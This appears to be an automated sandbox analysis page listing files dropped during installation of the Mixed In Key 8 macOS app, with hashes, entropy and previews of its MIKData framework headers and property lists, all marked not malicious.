Preview:	....................0...................__TEXT..........................................................__text..........__TEXT..........2...............2...............................__stubs.........__TEXT..................:.......................................__stub_helper...__TEXT..........@...............@...............................__gcc_except_tab__TEXT..........................................................__cstring.......__TEXT...........%...............%..............................__objc_methname.__TEXT..........\|=......z$......\|=..............................__objc_classname__TEXT...........a...............a..............................__objc_methtype.__TEXT...........c......D........c..............................__const.........__TEXT...........h......H........h..............................__unwind_info...__TEXT..........Hh......L.......Hh..............................__eh_frame......__TEXT...........k......h4.......k..................................8...__DATA..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_AgyvcH Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	486
Entropy (8bit):	4.880926064310765
Encrypted:	false
SSDEEP:	6:U1Igut6Zv5vzBv9vvLrNZvvaJAub9vvrvvZ/y8vvn6p/y8vvry8vvr1I88vvtzb7:Ustc9ZLrNNaJAubRbrnw5e8UdbRdDzbv
MD5:	E805BD672D7FDD919BB5202765FC8D87
SHA1:	EB4FB617E845CDE2773DE41D211C815FA12772EF
SHA-256:	C976A9DED6FDC714EEBA98C6F0828EE9DC9C9EAB4C51A65821ECE69562B48DDF
SHA-512:	953E13BFB74044A3E820CB5B219406B07294BB79C4008E9CE3FE1BCE5E48C38FB8B14DE264F67D59D5D6C17765EFE578A9CFF302DB266F5ECABB755815F842FF
Malicious:	false
Preview:	/. MIKData.h. * MIKData. . Created by patrickm on 07-06-11.. * Copyright 2011 Mixed In Key LLC. All rights reserved.. . /..#import <MIKData/MIKDatabase.h>.#import <MIKData/MIKDataCollection.h>.#import <MIKData/MIKDataSong.h>.#import <MIKData/MIKDataSongKeySegment.h>.#import <MIKData/MIKDataSongEnergySegment.h>.#import <MIKData/MIKDataCuePoint.h>.#import <MIKData/MIKDataSongWaveform.h>..#import <MIKData/MIKDataSongCollection.h>.#import <MIKData/MIKDataSmartCollection.h>.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_DCZBCe Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	582
Entropy (8bit):	4.992186098296493
Encrypted:	false
SSDEEP:	12:NDzviLucAUBHwdZJAezDDoVhxXtFQPYJAGGKrSl493DHIXpZRHn:NDz651BKZlDDIhx9Hz1Sle3DoXpfn
MD5:	A6A663256C08E74D1EFE36BF7E3C546D
SHA1:	3660C32DAF664FFFB49EC3F4B5CB4F594AC235A2
SHA-256:	3645840722EF1BAE4CBDBCF5B8A365BB23FBA756F0F5F77BA8486E16364496ED
SHA-512:	BFF6174F608B28443453F42C90204B1942E71FDC27FEE5FB19D434A292D0E43C6D14E9389481AF2C1FE3E9F145A662C17A28DF25C808FBD988E522DB6DB5E589
Malicious:	false
Preview:	//.// MIKDataSmartCollection.h.// MIKData.//.// Created by Chris Flesner on 12/3/14..// Copyright (c) 2014 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKDataSongCollection.h"...@class MIKDataCollection;.@interface MIKDataSmartCollection : NSObject <MIKDataSongCollection>.@property (nonatomic, copy) NSPredicate predicate;.@property (nonatomic, strong) MIKDataCollection libraryCollection;.@end..#pragma mark -..@interface MIKDataRecentsCollection : MIKDataSmartCollection.@property (nonatomic, assign) NSTimeInterval interval;.@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_QregNh Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	613
Entropy (8bit):	4.961761871939289
Encrypted:	false
SSDEEP:	12:X8QKWKHAUvNdOzwiyCaXh4jualpuQx6id/dIRal:sQIH1rYna2Suk6T/KRal
MD5:	0C3CAE75B38EE06AD3AAA3096CD2DB79
SHA1:	4E194A63CC4CB2C3575E7811808D1D164D4BF327
SHA-256:	FF30609FDC698E8EA21606842661380AF2AF051F987DD0AEDFC53C9E60DDAD96
SHA-512:	13CC047E7EBD35416724F6B86F8B246298C99D595D6B05A38B21091B9E63229F19BA4A90B8EAD9FB22747458A4C5C4B0D1D875667354AB0CB74EB3E609CE745D
Malicious:	false
Preview:	//.// MIKDataSongEnergySegment.h.// MIKData.//.// Created by Andrew Madsen on 4/19/13..// Copyright (c) 2013 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreData/CoreData.h>...@class MIKDataSong;.@interface MIKDataSongEnergySegment : NSManagedObject.@property (nonatomic, readonly, class) NSString entityName;.@property (nonatomic, retain) MIKDataSong song;..@property (nonatomic) float energy;.@property (nonatomic) double startTime;.@property (nonatomic) double length;.@property (nonatomic) double endTime;.@property (nonatomic, retain) NSString *comment;..@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_TkCcI4 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	606
Entropy (8bit):	5.155919107391079
Encrypted:	false
SSDEEP:	6:7bEKuIc2gLWQD/U6T096kpZA/C8OEnyoVaqy97h4JpPIvyvARxuony9WxUxnvy9a:vOLt/UKV/dOMyCaXh4jp6lixVnBRQhzE
MD5:	AA698164F6FBAD325DB1828B2B0F6F55
SHA1:	B2890E63199374FB507402650F0940163127C6E6
SHA-256:	E8DD4A081367FFF2958004D55115898C858D2D108260D6254DD9A6C48D0CA767
SHA-512:	E1BE9A9A29140966CE6DE25D7B878BAF19D941B403A5F516D8B6C2E17386F480F10B7295A4D56F45BFCEF089067C3E124405DB5A9ECF187767A17E4D41C5E027
Malicious:	false
Preview:	//.// MIKDataCuePoint.h.// MIKData.//.// Created by Chris Flesner on 6/29/16..// Copyright . 2016 Mixed In Key LLC. All rights reserved..//..#import <CoreData/CoreData.h>...NS_ASSUME_NONNULL_BEGIN..@class MIKDataSong;.@interface MIKDataCuePoint : NSManagedObject.@property (nonatomic, readonly, class) NSString entityName;.@property (nonnull, readonly) NSString shortName;..@property (nonatomic) double time;.@property (nonatomic) SInt16 energyLevel;.@property (nonatomic, copy, null_resettable) NSString name;.@property (nonatomic, strong, nullable) MIKDataSong song;.@end..NS_ASSUME_NONNULL_END.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_VxDbO4 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.120270180279075
Encrypted:	false
SSDEEP:	12:qJAuvHBWDX7HbjJA0BJAu+oVlh4jaoqrL4orLnroorTA17ln:qJPE777jdB2IIGr/oln
MD5:	2950B813F708E1206D8FE7E730A7A799
SHA1:	2BD490DD902B5D5A8803EEC7CDA3848F96B4A81F
SHA-256:	197E7E134F47721D01F32F7D910E31335F9DDB9A223DC6E412031C25C8638D78
SHA-512:	A0F0150A0DC071EDA209C3E0CFE9375D7DC8E77B4882729F54B725FFFF7990FCB930F12946DE349FBFD730C1536F6885D13F9B8ACF3D4BD9E343E40033F0778A
Malicious:	false
Preview:	//.// MIKDataCollection.h.// MIKData.//.// Created by patrickm on 23-04-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <CoreData/CoreData.h>.#import "MIKDataSongCollection.h"...FOUNDATION_EXPORT NSString * const MIKDataCollectionDidUpdateSongsNotification;..@interface MIKDataCollection : NSManagedObject <MIKDataSongCollection>.@property (nonatomic, readonly, class) NSString *entityName;.@property (nonatomic) BOOL isLibrary;..@property (nonatomic, readonly) BOOL isLibraryCollection;.@property (nonatomic, readonly) BOOL isUserCollection;.@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_YJcUvY Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	4809
Entropy (8bit):	5.0874480886644555
Encrypted:	false
SSDEEP:	96:TCJxxTg8su7ir7gTHgLA2f9LSSCd6pjEjXzNI:w9su7I9px
MD5:	3944A1F10FF239DA0B003A9B0323D56C
SHA1:	50B7BFAD9128C7B669CD05A72946F1A21859333D
SHA-256:	E56E5B68DA3A884D791C133B01C162E9979EFE148C407DC3451B1166DF63B6C6
SHA-512:	3790E7ABDF4C58BC1D43B55F444D7388ABFB08B987585C3ACFF581DCC4BB0C8BD7EB734CB5CF86612455EB6F7881E442193E2FE4871BD61B343945D8EBF73ECE
Malicious:	false
Preview:	//.// MIKDataSong.h.// MIKData.//.// Created by patrickm on 23-04-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <CoreData/CoreData.h>..NS_ASSUME_NONNULL_BEGIN..//.patsteboard type.extern NSString * const MIKDataSongPasteboardType;...@class NDAlias;.@class MIKDataCollection;.@class MIKDataSongEnergySegment;.@class MIKDataSongKeySegment;.@class MIKDataSongWaveform;.@class MIKBeats;.@class MIKDataCuePoint;..#define kMIKMinimumDataSongSegmentDuration 5.0..// MIKDataSongErrorCode error codes.typedef NS_ENUM(unsigned int, MIKDataSongErrorCode) {..MIKDataSongErrorSuccess = 0,.....// no error..MIKDataSongErrorFileNotFound,.....// file not found..MIKDataSongErrorFileTooLong,.....// file exceeds duration limit..MIKDataSongErrorAnalysisFailed.....// song cannot be analyzed (other error).};..@interface MIKDataSong : NSManagedObject..@property (nonatomic, class) BOOL resolvesBookmarksUsingSecurityScope; // Default is NO.@property (nonatomic, readonly, class) NSString

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_ik2GyT Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	478
Entropy (8bit):	5.080673442555204
Encrypted:	false
SSDEEP:	6:b1IMKFEKuIeiIUfWbRrT09fKsw9pKWC82C2CcI481I/oVaqy97h4JpPIvy9ICcIb:OMKOefWbRHAUvNdDm/CaXh4jViPKl/n
MD5:	F65E998BB7C9D18A7A90BD98DA7AF340
SHA1:	5F7B0BBD108099E3A4FD4EC8B12ED5F0CBD4497D
SHA-256:	0E5437707D30A959B08DEBE003095183D064D0CF6507ECB8CD4B9BCB5DFBB4FA
SHA-512:	81FE2B2BBAE9711BE80375E1F543EA04121B03A22AEACA127BC231981E64E87112B4E1E0963039D2AC30393888F2E271C35CDA394BB7959593935E2AE20B224D
Malicious:	false
Preview:	//.// MIKDataSongWaveform.h.// MIKData.//.// Created by Andrew Madsen on 8/12/13..// Copyright (c) 2013 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreData/CoreData.h>...@class MIKDataSong;.@class MIKNewWaveform;.@interface MIKDataSongWaveform : NSManagedObject.@property (nonatomic, readonly, class) NSString entityName;.@property (nonatomic, retain) MIKNewWaveform object;.@property (nonatomic, retain) MIKDataSong *song;.@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_l4vfyl Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	6240
Entropy (8bit):	5.122025609401223
Encrypted:	false
SSDEEP:	192:x/WTRA5JawDYtY/OaTuD7fWUhuOgeDoNb:ATRA5JawDYtY/OaTuP1q
MD5:	1770F7E86345CC6D445215041510ED14
SHA1:	E14C2EBEF4BD0E7203CD567A1F49FEB758C2F805
SHA-256:	095A3D2E7E9927E48B01F9FB1546483BEE442737883DFA0D40E1AE3525DAD82B
SHA-512:	46F525CDAE51727F8AC32440B56754F83016FB72CC71BDAFBC3519EBD2115194E856714B4E3FEA67960DE7F97DCD1EF0C260C5F633FDDB0088F11740A9C67714
Malicious:	false
Preview:	//.// MIKDatabase.h.// MIKData.//.// Created by patrickm on 24-04-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <Cocoa/Cocoa.h>..//.name of the database data file.extern NSString * const MIK_5_DB_NAME;.extern NSString * const MIK_6_DB_NAME;.extern NSString * const MIK_DB_NAME;.extern NSString * const MASHUP_1_DB_NAME;.extern NSString * const MASHUP_DB_NAME;..//.notifications.extern NSString * const MIKDatabaseMigrationWillBeginNotification;.extern NSString * const MIKDatabaseMigrationDidProgressNotification;.extern NSString * const MIKDatabaseMigrationDidFinishNotification;.extern NSString * const MIKDatabaseMigrationProgressKey;..extern NSString * const MIKDatabaseSyncWillBeginNotification;.extern NSString * const MIKDatabaseSyncMadeProgressNotification;.extern NSString * const MIKDatabaseSyncDidFinishNotification;.extern NSString * const MIKDatabaseSyncProgressKey;.extern NSString * const MIKDatabaseSyncObjectIDsForChangedSongsKey;.extern NSString * con

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_uNvcyf Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	462
Entropy (8bit):	4.996401421440394
Encrypted:	false
SSDEEP:	6:9zvIKuIc2gLWQAsT09fKswhGSfbjTIAy93rlJbvy9WWmy992zw3y93rley97mRrk:NviLucAUhGSfkhPxT8cBorTA17ln
MD5:	E4113C543DC1417D150F871D635205F2
SHA1:	7CEF5C7C8F6305AB8CCFE4CB6EC7E4BAD48EDF11
SHA-256:	9F3381185B6A14F64B68975CA43E1E0D102C2CCF120330FB9BCD9561119B5694
SHA-512:	CB6FDA38CDFEECC445BAE3A46541735BC931C8FB5E0B97B4A0823A4C909E47220F7ABFE9E88AC137EA5CA47D6405CEF8D84DDA8F4A301AF25977F7B881192AAC
Malicious:	false
Preview:	//.// MIKDataSongCollection.h.// MIKData.//.// Created by Chris Flesner on 12/3/14..// Copyright (c) 2014 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>...@protocol MIKDataSongCollection <NSObject>.@property (nonatomic, copy) NSString name;.@property (nonatomic) SInt16 index;.@property (nonatomic, retain) NSSet songs;.@property (nonatomic, copy) NSString *filter;.@property (nonatomic, readonly) BOOL isUserCollection;.@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_zA4ilG Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	969
Entropy (8bit):	4.946422719397011
Encrypted:	false
SSDEEP:	12:ZDNVQDX6dOjiyCaXh4jualQx6idirpup1IxpqdoqrLGwCZXD4Cck50xJrGAn:ZDNVQ78Zna2Su6TirkDyA/TCpcjacd1n
MD5:	E91F05811541150D171E229C645B0D50
SHA1:	8B903B0C1177133462C1FAA51462C3C6B1E0D2BE
SHA-256:	5ED1387CC8D73B323A7452F68BAA141A63994A4F57E2FFC2A0B570B113EFEB6D
SHA-512:	E66070A07602A3A02B77015664DD99795A9B6D0CBD6F38BAC137B77FEA3CB4EC8AFAC622801E34690567D4E8691D0A06169D91583C70C9D48EF98E06CC424924
Malicious:	false
Preview:	//.// MIKDataSongKeySegment.h.// MIKData.//.// Created by patrickm on 27-04-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <CoreData/CoreData.h>..@class MIKDataSong;.@interface MIKDataSongKeySegment : NSManagedObject.@property (nonatomic, readonly, class) NSString entityName;.@property (nonatomic, retain) MIKDataSong song;..@property (nonatomic) double startTime;.@property (nonatomic) double length;.@property (nonatomic) double endTime;..@property (nonatomic, copy) NSString *key;.@property (nonatomic) float energy;.@property (nonatomic) float volume;.@property (nonatomic) float confidence;.@property (nonatomic) BOOL singleNote;..// -isEqual: must not be overridden by subclasses of NSManagedObject,.// so we use -isEquivalent: instead. This method is used by the database.// merge feature to test whether a song segment in one database is.// equivalent to a song segment in another database.- (BOOL)isEquivalent:(id)object;.@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Modules/.BC.T_QCE5LG Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text
Category:	dropped
Size (bytes):	95
Entropy (8bit):	4.316885021538947
Encrypted:	false
SSDEEP:	3:96XzKmrhEBY6XABvIPhERuvAdSzvAtz4gXzFCC:MX31UY6XkI6RdSDAdXpCC
MD5:	2EB1A975C891345D7E01CC61C513511A
SHA1:	2211ADB4FBB25226D44EE07209734B465C59B116
SHA-256:	F64609D8081FA104F310690C295A4116334B314047BE0361F3F382C510A098CB
SHA-512:	920BD805F90D75E0B9C3ED7F0150EB4D53A8DF832BF4538C6889C04564513C46283912B1A2483F40387DC62F7381A2B286D1101F028276564745E5A060B64F4F
Malicious:	false
Preview:	framework module MIKData {. umbrella header "MIKData.h".. export . module { export * }.}.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_5qAkPg Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1175
Entropy (8bit):	5.190029047075801
Encrypted:	false
SSDEEP:	24:2dfyiwBVw6Nf3oMa642Rw0gp/sH2PgCGexwMZhGt0b:cfyfVtf3ocjO0giH2ICGcwcGt0b
MD5:	D7F7A88BCC73179383AA7481B0C9C25B
SHA1:	61366A2A4FF4002EE62311EB8F39619049AD7B6B
SHA-256:	D0E345EF77F540F2A1676E281254D9334C42BB38D8E73D635466F6E9821F2551
SHA-512:	89CDABD26B9E8A9BB203C3B8494483B9090EF1A64465725A4D4A6738D4937BD368C5E04E0A184FC205C56AB0B7B63E85B037FB4D22F14D3E556F5AA2FB2E7F01
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>MIKData</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.MIKData</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</key>..<string>GM</string>..<key>DTSDKBuild</key>..<string>17E

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_HjMl4l Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	13775
Entropy (8bit):	6.608720054256828
Encrypted:	false
SSDEEP:	384:3AYtk87uDpGAZKQ60VTHBIJETx9Rkr0/fM:I87uDMuKUVTBTx9ir8M
MD5:	66A341895464CBDDA305108065CBE058
SHA1:	D2E54ADF0B0158CA6B621712AD233E7774B75315
SHA-256:	07D91E4FDA2C6CFAB5FAE9BD0FF6D2ECFA4DA1F09BE24D845A2F65530F7BDFA8
SHA-512:	F590BD3495EF349A118F9BB205A817761D6EA7600C9417C7F5BAF219AFBE9BB82FEE32E185FBC784CE401E31E6C68A0934ADC0E7E86000921ECED8B925ABCA7A
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top..................0.1.2.3.4.>.G.H.M.N.V.[.`.c.f.g.j.m.r.s.v.z...............................................................................................$.%..-.1.4.:.;.@.C.G.J.P.Q.V.Y.].`.d.j.k.p.q.t.y.\|...........................................................................................!.$.(...3.4.7.<.?.D.G.K.N.Z.[.\.].b.g.h.k.p.s.v.{.~................................................................................... .%.(.,./.5.:.=.A.D.J.K.Q.R.W.Z.^.a.g.h.m.p.t.w.x.~....................................................................................... .#.'..0.1.6.7.:.?.B.C.H.K.O.R.S.Y.Z._.`.c.h.k.l.q.t.x.{.\|.........................................................................................!.%.(...3.6.:.=.C.D.I.L.P.S.T.Z._.b.f.i.o.t.w.{.~..........................U$null............._..NSEntityMappingsByNameV$class_..NSEntityMappings.................ZNS.objects..............6.f....A.................. ...!.".#.$

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_SjqKYZ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	9178
Entropy (8bit):	6.516021372092584
Encrypted:	false
SSDEEP:	192:e+4TPdtV/s9gb6Q4QiQPq4lFfI0DRH6rTduFYqfs5MEK:T8df/s9UfdjFg6VCTdUqMEK
MD5:	7D94D086AD0E51C43245607155271F69
SHA1:	0DFE3290199A3A096909F8B7DC5AAD3B61FB5148
SHA-256:	D2701C583538FFA76FD6FBEE97118539BFDB1167DDAA5A1E3A2C5AAE618A6917
SHA-512:	39EF257047B9EDF033655B0BB87E2D2808C949DB49069A72A78E1999E14B6456FB39BD5AE9B1CE1DFCFCF7A7BDB2AF9A00BB971A2EE8C752E639943667A9C5B6
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top..................../.0.1.2.<.E.F.K.L.T.Y.^.a.d.e.h.k.p.q.t.x.}.~.......................................................................................".(.)...1.5.8.<.B.C.H.I.L.Q.T.U.Z.].a.d.h.u.v.w.x.}.......................................................................................!.%.(.../.4.7.;.>.D.I.L.P.S.Y.Z._.b.f.i.o.p.u.x.\|.......................................................................................!.".#.$.%../.0.3.8.;.>.C.F.J.M.N.T.Z.[.`.c.g.j.p.q.v.y.}........................................U$null............._..NSEntityMappingsByNameV$class_..NSEntityMappings................ZNS.objects..........[......................... .!.".".$.%.&.'.(.)..+.&.-_..NSDestinationEntityName_..NSSourceEntityName]NSMappingName_..NSDestinationEntityVersionHashZNSUserInfo_..NSSourceEntityVersionHash_..NSSourceExpression_..NSRelationshipMappings]NSMappingType_. NSEntityMigrationPolicyClassName_..NSAttributeMappings........

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_vfSU11 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	10315
Entropy (8bit):	6.592642192702952
Encrypted:	false
SSDEEP:	192:AJqDLOGe7rO6z5ioZQyZRy0VAIuW/v1xxqzHT:As+R3O6zcyc0GINn/xqjT
MD5:	5407C54C4C3DFA524594E18762944E73
SHA1:	54412F8EA70EA72CC95480F44E9CE941E02032C3
SHA-256:	203C3D6936F8C9C747A73871B720D980F31F79DD094F63B4B5E2DCC032274878
SHA-512:	66CB19FFB8F7B049EB4B675336C5CEE1D9DD8019FFE13AB3E10A755D2D9379A0841D9753A0E4CBDE180C9BFC7F0CE6196F187F967852E87D87B0D808CA2D9799
Malicious:	false
Preview:	bplist00..............W.XX$versionX$objectsY$archiverT$top..................0.1.2.9.B.C.J.P.Q.W.X.^._.b.f.l.m.q.~...........................................................................................".(.-.0.4.7.=.>.C.F.J.M.N.T.Y.\.`.c.i.j.o.r.v.y.}.................................................................................".&.).*.0.1.6.9.=.@.F.G.M.N.T.U.Z.].a.d.e.k.p.s.w.z.......................................................................................$.'.+...5.;.<.A.B.E.J.M.N.S.V.Z.].c.d.j.k.p.q.t.y.\|.}......................................................................................... .%.&.)...1.6.9.=.@.O.SU$null............._..NSEntityMappingsByNameV$class_..NSEntityMappings.................ZNS.objects................g.o................... ...!.".#.$.%.$.'.%.%.%.+.,.-.%./_..NSDestinationEntityName_..NSSourceEntityName]NSMappingName_..NSDestinationEntityVersionHashZNSUserInfo_..NSSourceEntityVersionHash_..NSSourceExpression_..NSRelationshipMappings]NSMappingType

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_2hRaMX Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	9154
Entropy (8bit):	6.475968492892076
Encrypted:	false
SSDEEP:	192:Tmt60AAbifYYTZbYwd5equrEssTFdaNE/Krp27glw9:7rKUYqOmviMM0
MD5:	0F63727FC7E1DD9BD7916B3942F2E9E6
SHA1:	0AB1FEB82A16CBE9A4E775B52D0A4EE69526FD1A
SHA-256:	9D0240475523C206C1401430F7B7FD7604DC8F5AEC059447CF4431958C625C2E
SHA-512:	32439286B40AB6CCAC5E38C04B97DDE96AC6D1A8708E4A1188EFC7603ACCA8C0A421A8934FC085490A54A229059CAD1A9B7F3706AA4145EA49F067A134436C16
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............!.".#.$.%.&.>.?.C.J......................................................................................... ..+.7.?.I.T.^.h.i.s.t.}....................................... .(.,.0.4.5.8.?.D.H.K.O.P.Q.Z.^.`.e.n.r.z.~...............................................................&./.8.A.B.F.T.U.V.W._.i.q.r.z.~........................U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class.................... WNS.keysZNS.objects...................................-.>.R.2..TSongZKeySegment]EnergySegmentZCollectionXWaveform..'.(.)....+.,.-.../.0.1.2.3.4.5.6...8.9...;....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier...g.....t...i.s........[MIKDataSong........@.A. ......D.E.F.GZ$classnameX$classes_..NSMutableDictionary..F.H.I\NSDi

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_DmROhG Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	8506
Entropy (8bit):	6.477911087227787
Encrypted:	false
SSDEEP:	192:JNhv5uTIRV1YH0nb/wHPqXO96Csg/TX3FvkFnYBJqpkn4FtreA:JlrwHPqeQ2/z3hkyJQw4reA
MD5:	1037106A9A3CC59EA0E9A2FC853302FD
SHA1:	64E4E4DB1547D433EE4356246B4E9D4F055A22E9
SHA-256:	C1AA5ABA052D5B4DF347E7EB5E5812D2F2F37EB4693F0FD6E91BF6DF1748A25A
